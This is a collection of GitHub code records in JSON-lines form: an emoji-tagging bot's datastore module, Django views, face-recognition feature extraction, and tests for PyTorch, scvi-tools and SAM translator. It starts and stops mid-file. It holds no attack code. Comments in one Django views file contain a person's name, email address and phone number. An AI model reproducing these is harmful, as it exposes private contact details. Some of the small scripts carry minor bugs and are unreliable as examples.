self.currentLanguageHasRomanLetters():\n if self.ongoingUpperCaseTags >= parameters.COUNT_CONSECUTIVE_UPPER_WORDS_BEFORE_MESSAGE:\n return 2\n if self.ongoingUpperCaseTags > -parameters.COUNT_CONSECUTIVE_UPPER_WORDS_BEFORE_MESSAGE:\n return 1\n return 0\n\n def hasSeenEnoughKnownEmoji(self):\n return self.ongoingAlreadyTaggedEmojis >= parameters.MAX_NUMBER_OF_ALREADY_KNOWN_EMOJI_IN_A_ROW\n\n def setDisableDiacriticsWarning(self, value, put=True):\n self.disableDiacriticsWarning = True\n if put:\n self.put()\n\ndef getUserTaggingId(person):\n return person.getLanguageCode() + ' ' + str(person.chat_id)\n\ndef getUserTaggingEntry(person):\n unique_id = getUserTaggingId(person)\n return UserTagging.get_by_id(unique_id)\n\ndef getOrInsertUserTaggingEntry(person):\n userTagginEntry = getUserTaggingEntry(person)\n unique_id = getUserTaggingId(person)\n if not userTagginEntry:\n userTagginEntry = UserTagging(\n id=unique_id,\n chat_id = person.chat_id,\n lang_code = person.getLanguageCode(),\n emojiTagsTable = {}\n )\n userTagginEntry.put()\n return userTagginEntry\n\ndef getNumberUsersWhoHavePlayed(lang_code):\n return UserTagging.query(\n UserTagging.lang_code == lang_code,\n ).count()\n\ndef getLanguagesWithProposedTags():\n entries = UserTagging.query(\n projection=[UserTagging.lang_code],\n distinct=True\n ).fetch()\n return [x.lang_code for x in entries]\n\n###################\n# MAIN CLASS AggregatedEmojiTags\n###################\n\nclass AggregatedEmojiTags(ndb.Model):\n # id = lang_code emoji\n timestamp = ndb.DateTimeProperty(auto_now=True)\n lang_code = ndb.StringProperty()\n emoji = ndb.StringProperty()\n annotators_count = ndb.IntegerProperty(default=0)\n tags_count = ndb.IntegerProperty(default=0)\n tagsCountTable = ndb.PickleProperty() #defaultdict(int)\n\n def getLanguageCode(self):\n return self.lang_code.encode('utf-8')\n\ndef getAggregatedEmojiTagsId(lang_code_utf, emoji_utf):\n return lang_code_utf + ' ' + emoji_utf\n\ndef getAggregatedEmojiTagsEntry(lang_code, emoji_uni):\n unique_id = getAggregatedEmojiTagsId(lang_code, emoji_uni)\n return AggregatedEmojiTags.get_by_id(unique_id)\n\n@ndb.transactional(retries=100, xg=True)\ndef addInAggregatedEmojiTags(userTaggingEntry):\n lang_code_utf = userTaggingEntry.getLanguageCode()\n emoji_utf = userTaggingEntry.getLastEmoji()\n tags = userTaggingEntry.emojiTagsTable[emoji_utf]\n unique_id = getAggregatedEmojiTagsId(lang_code_utf, emoji_utf)\n aggregatedEmojiTags = AggregatedEmojiTags.get_by_id(unique_id)\n if not aggregatedEmojiTags:\n aggregatedEmojiTags = AggregatedEmojiTags(\n id=unique_id,\n parent=None,\n namespace=None,\n lang_code=lang_code_utf,\n emoji=emoji_utf,\n tagsCountTable=defaultdict(int)\n )\n for t in tags:\n aggregatedEmojiTags.tagsCountTable[t] +=1\n aggregatedEmojiTags.annotators_count += 1\n aggregatedEmojiTags.tags_count += len(tags)\n aggregatedEmojiTags.put()\n return aggregatedEmojiTags\n\ndef getPrioritizedEmojiForUser(userTaggingEntry):\n emoji_esclusion_list = userTaggingEntry.emojiTagsTable.keys()\n lang_code = userTaggingEntry.lang_code\n entries = AggregatedEmojiTags.query(\n AggregatedEmojiTags.lang_code == lang_code,\n AggregatedEmojiTags.annotators_count <= parameters.MAX_ANNOTATORS_PER_PRIORITIZED_EMOJI,\n ).order(AggregatedEmojiTags.annotators_count).iter(projection=[AggregatedEmojiTags.emoji])\n for e in entries:\n emoji_utf = e.emoji.encode('utf-8')\n if emoji_utf not in emoji_esclusion_list:\n return emoji_utf\n #logging.debug(\"Discarding {0} because already seen by user\".format(emoji_utf))\n 
return None\n\n# returns annotatorsCount, tagsCount, stats\ndef getTaggingStats(userTaggingEntry):\n lang_code = userTaggingEntry.getLanguageCode()\n emoji_utf = userTaggingEntry.getLastEmoji()\n aggregatedEmojiTags = getAggregatedEmojiTagsEntry(lang_code, emoji_utf)\n if aggregatedEmojiTags:\n return aggregatedEmojiTags.annotators_count, \\\n aggregatedEmojiTags.tags_count, \\\n aggregatedEmojiTags.tagsCountTable\n return 0, 0, {}\n\n\ndef getStatsFeedbackForTagging(userTaggingEntry, proposedTag):\n annotatorsCount, tagsCount, tagsCountDict = getTaggingStats(userTaggingEntry)\n logging.debug('stats: ' + str(tagsCountDict))\n msg = ''\n if tagsCount == 0:\n msg += \"🏅 You are the first annotator for this term for this emoji!\"\n else:\n msg += '\\n'\n \"\"\"\n if annotatorsCount==1:\n msg += \"{0} person has provided a new term for this emoji:\\n\".format(str(annotatorsCount))\n else:\n msg += \"{0} people have provided new terms for this emoji:\\n\".format(str(annotatorsCount))\n \"\"\"\n agreement = proposedTag in tagsCountDict.keys()\n sortedTagsInDict = sorted(tagsCountDict.keys(), key=tagsCountDict.get, reverse=True)\n if agreement:\n agreementCount = tagsCountDict[proposedTag]\n # CHECK IF TO GO PUBLIC\n if agreementCount + 1 == parameters.MIN_COUNT_FOR_USER_TAG_TO_BE_PUBLIC:\n msg += \"\\n🎉🎉🎉 This tag has reached the required number of votes and will be added to the dictionary!\\n\"\n emojiTables.addUserDefinedTag(userTaggingEntry.getLanguageCode(), userTaggingEntry.getLastEmoji(), proposedTag)\n else:\n if agreementCount == 1:\n msg += \"🎉 1 person agrees with your term! 😊 \\n\"\n else:\n msg += \"🎉 {0} people agree with your term! 😊 \\n\".format(str(agreementCount))\n\n sortedTagsInDict.remove(proposedTag)\n else:\n msg += \"🤔 So far, no one agrees with you.\\n\"\n maxSize = parameters.MAX_NUMBER_OF_DISPLAYED_TAGS_ALTERNATIVE\n for k in sortedTagsInDict[:maxSize]:\n count = tagsCountDict[k]\n msg += \" {0} suggested: {1}\\n\".format(str(count), k)\n restCount = sum(tagsCountDict[k] for k in sortedTagsInDict[maxSize:])\n if restCount > 0:\n msg += \" ... 
{0} suggested other things\".format(str(restCount))\n return msg\n\ndef getNumberOfEmojiBeingTagged(lang_code):\n return AggregatedEmojiTags.query(\n AggregatedEmojiTags.lang_code == lang_code,\n ).count()\n\n#==============================\n# REQUEST HANDLERS\n#==============================\nclass TaggingUserTableHandler(webapp2.RequestHandler):\n def get(self, lang_code):\n #urlfetch.set_default_fetch_deadline(60)\n full = self.request.get('full') == 'true'\n qry = UserTagging.query(UserTagging.lang_code == lang_code)\n result = {}\n for entry in qry:\n user = person.getPersonByChatId(entry.chat_id)\n result[entry.chat_id] = {\n \"name\": user.getFirstName() if user else \"Unknown ({0})\".format(str(entry.chat_id)),\n \"total taggings\": len(entry.emojiTagsTable),\n }\n if full:\n result[entry.chat_id][\"translation table\"] = entry.emojiTagsTable\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(json.dumps(result, indent=4, ensure_ascii=False))\n\nclass TaggingAggregatedTableHandler(webapp2.RequestHandler):\n def get(self, lang_code):\n #urlfetch.set_default_fetch_deadline(60)\n qry = AggregatedEmojiTags.query(AggregatedEmojiTags.lang_code == lang_code)\n result = {}\n for entry in qry:\n result[entry.emoji.encode('utf-8')] = {\n \"annotators count\": entry.annotators_count,\n \"tagging table\": entry.tagsCountTable\n }\n self.response.headers['Content-Type'] = 'application/json; charset=utf-8'\n self.response.out.write(json.dumps(result, indent=4, ensure_ascii=False))\n\n#======================\n# VERY DANGEROUS OPERATIONS\n#======================\n\n\ndef deleteTagging(lang_code=None):\n if lang_code:\n ndb.delete_multi(UserTagging.query(\n UserTagging.lang_code == lang_code).fetch(keys_only=True))\n ndb.delete_multi(AggregatedEmojiTags.query(\n AggregatedEmojiTags.lang_code == lang_code).fetch(keys_only=True))\n ndb.delete_multi(\n emojiTables.LanguageEmojiTag.query(\n emojiTables.LanguageEmojiTag.lang_code == lang_code,\n emojiTables.LanguageEmojiTag.has_users_tags == True).fetch(keys_only=True))\n else:\n ndb.delete_multi(UserTagging.query().fetch(keys_only=True))\n ndb.delete_multi(AggregatedEmojiTags.query().fetch(keys_only=True))\n ndb.delete_multi(\n emojiTables.LanguageEmojiTag.query(\n emojiTables.LanguageEmojiTag.has_users_tags == True).fetch(keys_only=True))\n","repo_name":"unior-nlp-research-group/EmojiWorldBot","sub_path":"userTagging.py","file_name":"userTagging.py","file_ext":"py","file_size_in_byte":11959,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30399570854","text":"from django.shortcuts import render\nfrom . 
models import *\nfrom django.http import *\n\n\ndef index(request):\n d = post.objects.all()\n\n for i in d:\n print(i.tittle)\n print(i.text)\n return HttpResponse('Hello')\n # unreachable, and context_dict was never defined:\n # return render(request, 'index.html', context_dict)\n\n # Priya\n # priya@gmail.com\n # 9587499937","repo_name":"priyanka-kalaliya/Django","sub_path":"day2/mymodel/myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"14825035849","text":"import os\nimport unittest\n\nfrom tools.stats.upload_test_stats import get_tests, summarize_test_cases\n\nIN_CI = os.environ.get(\"CI\")\n\n\nclass TestUploadTestStats(unittest.TestCase):\n @unittest.skipIf(\n IN_CI,\n \"don't run in CI as this does a lot of network calls and uses up GH API rate limit\",\n )\n def test_existing_job(self) -> None:\n \"\"\"Run on a known-good job and make sure we don't error and get basically okay results.\"\"\"\n test_cases = get_tests(2561394934, 1)\n self.assertEqual(len(test_cases), 609873)\n summary = summarize_test_cases(test_cases)\n self.assertEqual(len(summary), 5068)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"pytorch/pytorch","sub_path":"tools/test/test_upload_test_stats.py","file_name":"test_upload_test_stats.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","stars":72779,"dataset":"github-code","pt":"72"} +{"seq_id":"40569317699","text":"# Train face recognition model\n# Extracts facial features from the images in each sub-folder in the datasets directory\n\nimport os, cv2, pickle, face_recognition\nfrom imutils import paths\n\ndef extract():\n # retrieve the path of each sub-data folder in the datasets folder\n # the datasets folder contains sub-folders containing images of various people\n imgPaths = list(paths.list_images('datasets'))\n\n names, knownEncodings = [], []\n\n # loop through the image paths list\n for (i, imgPath) in enumerate(imgPaths):\n name = imgPath.split(os.path.sep)[-2] # extract person's name from the image path\n\n # load the input image: convert it from OpenCV ordering BGR to dlib ordering RGB\n image = cv2.imread(imgPath)\n rgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n # locate faces using the face_recognition library\n boxes = face_recognition.face_locations(rgb, model='hog')\n\n # compute facial embeddings of the face\n encodings = face_recognition.face_encodings(rgb, boxes)\n\n # loop over encodings list\n for encoding in encodings:\n knownEncodings.append(encoding)\n names.append(name)\n\n # save encodings and name in a data dictionary\n data = {\n \"encodings\": knownEncodings,\n \"names\": names\n }\n\n # save the data into a file for use later\n f = open(\"face_enc\", \"wb\")\n f.write(pickle.dumps(data))\n f.close()\n","repo_name":"david-weir/Class-Attendance-and-Face-Mask-Detection","sub_path":"src/feature_extract.py","file_name":"feature_extract.py","file_ext":"py","file_size_in_byte":1439,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"18667378044","text":"from django.shortcuts import render,redirect, get_object_or_404\nfrom django.http import JsonResponse\nfrom inventory.models import ProductInventory\nfrom .basket import Basket\nfrom checkout.models import Delivery\n# Create your views here.\n\n\n# BASKET LIST\ndef basket_list(request):\n return render(request, 'basket/list.html')\n# END BASKET LIST\n\n\n#ADD BASKET VIEWS\ndef 
add_basket(request):\n \"\"\"\n Add-button view: grabs the product info sent via Ajax\n and responds with a JsonResponse.\n \"\"\"\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n quantity = int(request.POST.get('product_quantity'))\n product_id = int(request.POST.get('product_id'))\n product_inventory = get_object_or_404(ProductInventory, pk=product_id)\n basket.add(product_inventory, quantity)\n\n total_quantity = len(basket)\n\n response = JsonResponse({'total_qty': total_quantity})\n return response\n#END ADD BASKET VIEWS\n\n\n#UPDATE BASKET VIEWS\ndef update_basket(request):\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n product_quantity = int(request.POST.get('product_quantity'))\n product_id = request.POST.get('product_id')\n basket.update_basket(product_id, product_quantity)\n total_qty = len(basket)\n total_price = basket.get_total_price()\n\n response = JsonResponse({'total_price': total_price, 'total_qty': total_qty})\n return response\n\n\n#DELETE BASKET VIEWS\ndef delete_basket(request):\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n product_id = request.POST.get('product_id')\n basket.remove(product_id)\n total_qty = len(basket)\n total_price = basket.get_total_price()\n\n response = JsonResponse({'total_price': total_price, 'total_qty': total_qty})\n return response\n#END DELETE BASKET VIEWS\n \n\n# DELIVERY CHANGE OPTIONS RADIO\ndef basket_update_delivery(request):\n basket = Basket(request)\n if request.POST.get('action') == 'post':\n delivery_id = int(request.POST.get(\"deliveryoption\"))\n delivery = get_object_or_404(Delivery, pk=delivery_id)\n total_price = basket.basket_update_delivery(delivery_price=delivery.delivery_price)\n\n session = request.session\n if 'purchase' not in request.session:\n session['purchase'] = {\n 'delivery_id': delivery.id\n }\n else:\n session['purchase']['delivery_id'] = delivery.id\n session.modified = True\n\n response = JsonResponse({\n \"total\": total_price,\n \"delivery_price\": delivery.delivery_price\n })\n return response\n# END DELIVERY CHANGE OPTIONS RADIO\n\n\n","repo_name":"Jetkerpy/obazar-ecommerce","sub_path":"basket/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2758,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73846504871","text":"elementos = []\ni = 0\nx = int(input(\"Say how many elements the list will have: \"))\nwhile True:\n n = int(input(\"Enter a value: \"))\n if n == 0:\n break\n elementos.append(n)\n elementos.sort()\n i += 1\n print(elementos[0:x])","repo_name":"1Sayza/-Python-for-Beginners","sub_path":"QUESTAO 10.py","file_name":"QUESTAO 10.py","file_ext":"py","file_size_in_byte":228,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"33068970841","text":"from typing import Optional\n\nimport mudata\nimport numpy as np\nimport pytest\n\nfrom scvi.data import synthetic_iid\nfrom scvi.external import Tangram\n\nmodalities = {\"density_prior_key\": \"sp\", \"sc_layer\": \"sc\", \"sp_layer\": \"sp\"}\n\n\ndef _get_mdata(sparse_format: Optional[str] = None):\n dataset1 = synthetic_iid(batch_size=100, sparse_format=sparse_format)\n dataset2 = dataset1[-25:].copy()\n dataset1 = dataset1[:-25].copy()\n mdata = mudata.MuData({\"sc\": dataset1, \"sp\": dataset2})\n ad_sp = mdata.mod[\"sp\"]\n rna_count_per_spot = np.asarray(ad_sp.X.sum(axis=1)).squeeze()\n 
ad_sp.obs[\"rna_count_based_density\"] = rna_count_per_spot / np.sum(\n rna_count_per_spot\n )\n ad_sp.obs[\"bad_prior\"] = np.random.uniform(size=ad_sp.n_obs)\n return mdata\n\n\n@pytest.mark.parametrize(\n \"density_prior_key,constrained\",\n [\n (None, False),\n (\"rna_count_based_density\", False),\n (\"rna_count_based_density\", True),\n ],\n)\ndef test_tangram(density_prior_key, constrained):\n mdata = _get_mdata()\n Tangram.setup_mudata(\n mdata,\n density_prior_key=density_prior_key,\n modalities=modalities,\n )\n if constrained:\n target_count = 2\n else:\n target_count = None\n model = Tangram(mdata, constrained=constrained, target_count=target_count)\n model.train(max_epochs=1)\n mdata.mod[\"sc\"].obsm[\"mapper\"] = model.get_mapper_matrix()\n model.project_cell_annotations(\n mdata.mod[\"sc\"],\n mdata.mod[\"sp\"],\n mdata.mod[\"sc\"].obsm[\"mapper\"],\n mdata.mod[\"sc\"].obs.labels,\n )\n model.project_genes(mdata.mod[\"sc\"], mdata.mod[\"sp\"], mdata.mod[\"sc\"].obsm[\"mapper\"])\n\n\ndef test_tangram_errors():\n mdata = _get_mdata()\n Tangram.setup_mudata(\n mdata,\n density_prior_key=\"rna_count_based_density\",\n modalities=modalities,\n )\n with pytest.raises(ValueError):\n Tangram(mdata, constrained=True, target_count=None)\n\n with pytest.raises(ValueError):\n Tangram.setup_mudata(\n mdata,\n density_prior_key=\"bad_prior\",\n modalities=modalities,\n )\n Tangram(mdata)\n","repo_name":"scverse/scvi-tools","sub_path":"tests/external/test_tangram.py","file_name":"test_tangram.py","file_ext":"py","file_size_in_byte":2149,"program_lang":"python","lang":"en","doc_type":"code","stars":1037,"dataset":"github-code","pt":"72"} +{"seq_id":"40016530682","text":"import copy\n\nfrom unittest import TestCase\nfrom mock import Mock\nfrom parameterized import parameterized, param\n\nfrom samtranslator.swagger.swagger import SwaggerEditor\n\n_X_INTEGRATION = \"x-amazon-apigateway-integration\"\n_X_ANY_METHOD = 'x-amazon-apigateway-any-method'\n\nclass TestSwaggerEditor_init(TestCase):\n\n def test_must_raise_on_invalid_swagger(self):\n\n invalid_swagger = {\"paths\": {}} # Missing \"Swagger\" keyword\n with self.assertRaises(ValueError):\n SwaggerEditor(invalid_swagger)\n\n def test_must_succeed_on_valid_swagger(self):\n valid_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {},\n \"/bar\": {}\n }\n }\n\n editor = SwaggerEditor(valid_swagger)\n self.assertIsNotNone(editor)\n\n self.assertEquals(editor.paths, {\"/foo\": {}, \"/bar\": {}})\n\n\nclass TestSwaggerEditor_has_path(TestCase):\n\n def setUp(self):\n self.swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {},\n \"somemethod\": {}\n },\n \"/bar\": {\n \"post\": {},\n _X_ANY_METHOD: {}\n },\n \"badpath\": \"string value\"\n }\n }\n\n self.editor = SwaggerEditor(self.swagger)\n\n def test_must_find_path_and_method(self):\n self.assertTrue(self.editor.has_path(\"/foo\"))\n self.assertTrue(self.editor.has_path(\"/foo\", \"get\"))\n self.assertTrue(self.editor.has_path(\"/foo\", \"somemethod\"))\n self.assertTrue(self.editor.has_path(\"/bar\"))\n self.assertTrue(self.editor.has_path(\"/bar\", \"post\"))\n\n def test_must_find_with_method_case_insensitive(self):\n self.assertTrue(self.editor.has_path(\"/foo\", \"GeT\"))\n self.assertTrue(self.editor.has_path(\"/bar\", \"POST\"))\n\n # Only Method is case insensitive. Path is case sensitive\n self.assertFalse(self.editor.has_path(\"/FOO\"))\n\n def test_must_work_with_any_method(self):\n \"\"\"\n Method name \"ANY\" is special. 
It must be converted to the x-amazon style value before search\n \"\"\"\n self.assertTrue(self.editor.has_path(\"/bar\", \"any\"))\n self.assertTrue(self.editor.has_path(\"/bar\", \"AnY\")) # Case insensitive\n self.assertTrue(self.editor.has_path(\"/bar\", _X_ANY_METHOD))\n self.assertFalse(self.editor.has_path(\"/foo\", \"any\"))\n\n def test_must_not_find_path(self):\n self.assertFalse(self.editor.has_path(\"/foo/other\"))\n self.assertFalse(self.editor.has_path(\"/bar/xyz\"))\n self.assertFalse(self.editor.has_path(\"/abc\"))\n\n def test_must_not_find_path_and_method(self):\n self.assertFalse(self.editor.has_path(\"/foo\", \"post\"))\n self.assertFalse(self.editor.has_path(\"/foo\", \"abc\"))\n self.assertFalse(self.editor.has_path(\"/bar\", \"get\"))\n self.assertFalse(self.editor.has_path(\"/bar\", \"xyz\"))\n\n def test_must_not_fail_on_bad_path(self):\n\n self.assertTrue(self.editor.has_path(\"badpath\"))\n self.assertFalse(self.editor.has_path(\"badpath\", \"somemethod\"))\n\nclass TestSwaggerEditor_has_integration(TestCase):\n\n def setUp(self):\n self.swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {\n _X_INTEGRATION: {\n \"a\": \"b\"\n }\n },\n \"somemethod\": {\n \"foo\": \"value\",\n },\n \"emptyintegration\": {\n _X_INTEGRATION: {}\n },\n \"badmethod\": \"string value\"\n },\n }\n }\n\n self.editor = SwaggerEditor(self.swagger)\n\n def test_must_find_integration(self):\n self.assertTrue(self.editor.has_integration(\"/foo\", \"get\"))\n\n def test_must_not_find_integration(self):\n self.assertFalse(self.editor.has_integration(\"/foo\", \"somemethod\"))\n\n def test_must_not_find_empty_integration(self):\n self.assertFalse(self.editor.has_integration(\"/foo\", \"emptyintegration\"))\n\n def test_must_handle_bad_value_for_method(self):\n self.assertFalse(self.editor.has_integration(\"/foo\", \"badmethod\"))\n\n\nclass TestSwaggerEditor_add_path(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"get\": {\"a\": \"b\"}\n },\n \"/bar\": {},\n \"/badpath\": \"string value\"\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n @parameterized.expand([\n param(\"/new\", \"get\", \"new path, new method\"),\n param(\"/foo\", \"new method\", \"existing path, new method\"),\n param(\"/bar\", \"get\", \"existing path, new method\"),\n ])\n def test_must_add_new_path_and_method(self, path, method, case):\n\n self.assertFalse(self.editor.has_path(path, method))\n self.editor.add_path(path, method)\n\n self.assertTrue(self.editor.has_path(path, method), \"must add for \"+case)\n self.assertEquals(self.editor.swagger[\"paths\"][path][method], {})\n\n def test_must_raise_non_dict_path_values(self):\n\n path = \"/badpath\"\n method = \"get\"\n\n with self.assertRaises(ValueError):\n self.editor.add_path(path, method)\n\n def test_must_skip_existing_path(self):\n \"\"\"\n Given an existing path/method, this must\n :return:\n \"\"\"\n\n path = \"/foo\"\n method = \"get\"\n original_value = copy.deepcopy(self.original_swagger[\"paths\"][path][method])\n\n self.editor.add_path(path, method)\n modified_swagger = self.editor.swagger\n self.assertEquals(original_value, modified_swagger[\"paths\"][path][method])\n\n\nclass TestSwaggerEditor_add_lambda_integration(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {\n \"post\": {\n \"a\": [1, 2, \"b\"],\n \"responses\": {\n \"something\": \"is already here\"\n }\n }\n },\n \"/bar\": 
{\n \"get\": {\n _X_INTEGRATION: {\n \"a\": \"b\"\n }\n }\n },\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n def test_must_add_new_integration_to_new_path(self):\n path = \"/newpath\"\n method = \"get\"\n integration_uri = \"something\"\n expected = {\n \"responses\": {},\n _X_INTEGRATION: {\n \"type\": \"aws_proxy\",\n \"httpMethod\": \"POST\",\n \"uri\": integration_uri\n }\n }\n\n self.editor.add_lambda_integration(path, method, integration_uri)\n\n self.assertTrue(self.editor.has_path(path, method))\n actual = self.editor.swagger[\"paths\"][path][method]\n self.assertEquals(expected, actual)\n\n def test_must_add_new_integration_to_existing_path(self):\n path = \"/foo\"\n method = \"post\"\n integration_uri = \"something\"\n expected = {\n # Current values present in the dictionary *MUST* be preserved\n \"a\": [1, 2, \"b\"],\n\n # Responses key must be untouched\n \"responses\": {\n \"something\": \"is already here\"\n },\n\n # New values must be added\n _X_INTEGRATION: {\n \"type\": \"aws_proxy\",\n \"httpMethod\": \"POST\",\n \"uri\": integration_uri\n }\n }\n\n # Just make sure test is working on an existing path\n self.assertTrue(self.editor.has_path(path, method))\n\n self.editor.add_lambda_integration(path, method, integration_uri)\n\n actual = self.editor.swagger[\"paths\"][path][method]\n self.assertEquals(expected, actual)\n\n def test_must_raise_on_existing_integration(self):\n\n with self.assertRaises(ValueError):\n self.editor.add_lambda_integration(\"/bar\", \"get\", \"integrationUri\")\n\n\nclass TestSwaggerEditor_iter_on_path(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {},\n \"/bar\": {},\n \"/baz\": \"some value\"\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n def test_must_iterate_on_paths(self):\n\n expected = {\"/foo\", \"/bar\", \"/baz\"}\n actual = set([path for path in self.editor.iter_on_path()])\n\n self.assertEquals(expected, actual)\n\n\nclass TestSwaggerEditor_add_cors(TestCase):\n\n def setUp(self):\n\n self.original_swagger = {\n \"swagger\": \"2.0\",\n \"paths\": {\n \"/foo\": {},\n \"/withoptions\": {\n \"options\": {\"some\": \"value\"}\n },\n \"/bad\": \"some value\"\n }\n }\n\n self.editor = SwaggerEditor(self.original_swagger)\n\n def test_must_add_options_to_new_path(self):\n allowed_origins = \"origins\"\n allowed_headers = [\"headers\", \"2\"]\n allowed_methods = {\"key\": \"methods\"}\n max_age = 60\n path = \"/foo\"\n expected = {\"some cors\": \"return value\"}\n\n self.editor._options_method_response_for_cors = Mock()\n self.editor._options_method_response_for_cors.return_value = expected\n\n self.editor.add_cors(path, allowed_origins, allowed_headers, allowed_methods, max_age)\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n self.editor._options_method_response_for_cors.assert_called_with(allowed_origins,\n allowed_headers,\n allowed_methods,\n max_age)\n\n def test_must_skip_existing_path(self):\n path = \"/withoptions\"\n expected = copy.deepcopy(self.original_swagger[\"paths\"][path][\"options\"])\n\n self.editor.add_cors(path, \"origins\", \"headers\", \"methods\")\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n\n def test_must_fail_with_bad_values_for_path(self):\n path = \"/bad\"\n\n with self.assertRaises(ValueError):\n self.editor.add_cors(path, \"origins\", \"headers\", \"methods\")\n\n def test_must_fail_for_invalid_allowed_origin(self):\n\n path = 
\"/foo\"\n with self.assertRaises(ValueError):\n self.editor.add_cors(path, None, \"headers\", \"methods\")\n\n def test_must_work_for_optional_allowed_headers(self):\n\n allowed_origins = \"origins\"\n allowed_headers = None # No Value\n allowed_methods = \"methods\"\n max_age = 60\n\n expected = {\"some cors\": \"return value\"}\n path = \"/foo\"\n\n self.editor._options_method_response_for_cors = Mock()\n self.editor._options_method_response_for_cors.return_value = expected\n\n self.editor.add_cors(path, allowed_origins, allowed_headers, allowed_methods, max_age)\n\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n\n self.editor._options_method_response_for_cors.assert_called_with(allowed_origins,\n allowed_headers,\n allowed_methods,\n max_age)\n\n def test_must_make_default_value_with_optional_allowed_methods(self):\n\n allowed_origins = \"origins\"\n allowed_headers = \"headers\"\n allowed_methods = None # No Value\n max_age = 60\n\n default_allow_methods_value = \"some default value\"\n default_allow_methods_value_with_quotes = \"'{}'\".format(default_allow_methods_value)\n expected = {\"some cors\": \"return value\"}\n path = \"/foo\"\n\n self.editor._make_cors_allowed_methods_for_path = Mock()\n self.editor._make_cors_allowed_methods_for_path.return_value = default_allow_methods_value\n\n self.editor._options_method_response_for_cors = Mock()\n self.editor._options_method_response_for_cors.return_value = expected\n\n self.editor.add_cors(path, allowed_origins, allowed_headers, allowed_methods, max_age)\n\n self.assertEquals(expected, self.editor.swagger[\"paths\"][path][\"options\"])\n\n self.editor._options_method_response_for_cors.assert_called_with(allowed_origins,\n allowed_headers,\n # Must be called with default value.\n # And value must be quoted\n default_allow_methods_value_with_quotes,\n max_age)\n\n\nclass TestSwaggerEditor_options_method_response_for_cors(TestCase):\n\n def test_correct_value_is_returned(self):\n self.maxDiff = None\n headers = \"foo\"\n methods = {\"a\": \"b\"}\n origins = [1,2,3]\n max_age = 60\n\n expected = {\n \"summary\": \"CORS support\",\n \"consumes\": [\"application/json\"],\n \"produces\": [\"application/json\"],\n _X_INTEGRATION: {\n \"type\": \"mock\",\n \"requestTemplates\": {\n \"application/json\": \"{\\n \\\"statusCode\\\" : 200\\n}\\n\"\n },\n \"responses\": {\n \"default\": {\n \"statusCode\": \"200\",\n \"responseParameters\": {\n \"method.response.header.Access-Control-Allow-Headers\": headers,\n \"method.response.header.Access-Control-Allow-Methods\": methods,\n \"method.response.header.Access-Control-Allow-Origin\": origins,\n \"method.response.header.Access-Control-Max-Age\": max_age\n },\n \"responseTemplates\": {\n \"application/json\": \"{}\\n\"\n }\n }\n }\n },\n \"responses\": {\n \"200\": {\n \"description\": \"Default response for CORS method\",\n \"headers\": {\n \"Access-Control-Allow-Headers\": {\n \"type\": \"string\"\n },\n \"Access-Control-Allow-Methods\": {\n \"type\": \"string\"\n },\n \"Access-Control-Allow-Origin\": {\n \"type\": \"string\"\n },\n \"Access-Control-Max-Age\": {\n \"type\": \"integer\"\n }\n }\n }\n }\n }\n\n actual = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(origins, headers, methods, max_age)\n self.assertEquals(expected, actual)\n\n def test_allow_headers_is_skipped_with_no_value(self):\n headers = None # No value\n methods = \"methods\"\n origins = \"origins\"\n\n expected = {\n 
\"method.response.header.Access-Control-Allow-Methods\": methods,\n \"method.response.header.Access-Control-Allow-Origin\": origins\n }\n\n expected_headers = {\n \"Access-Control-Allow-Methods\": {\n \"type\": \"string\"\n },\n \"Access-Control-Allow-Origin\": {\n \"type\": \"string\"\n }\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n self.assertEquals(expected_headers, options_config[\"responses\"][\"200\"][\"headers\"])\n\n def test_allow_methods_is_skipped_with_no_value(self):\n headers = \"headers\"\n methods = None # No value\n origins = \"origins\"\n\n expected = {\n \"method.response.header.Access-Control-Allow-Headers\": headers,\n \"method.response.header.Access-Control-Allow-Origin\": origins\n }\n\n options_config = SwaggerEditor(SwaggerEditor.gen_skeleton())._options_method_response_for_cors(\n origins, headers, methods)\n\n actual = options_config[_X_INTEGRATION][\"responses\"][\"default\"][\"responseParameters\"]\n self.assertEquals(expected, actual)\n\n def test_allow_origins_is_not_skipped_with_no_value(self):\n headers = None\n methods = None\n origins = None\n\n expected = {\n # We will ALWAYS set AllowOrigin. 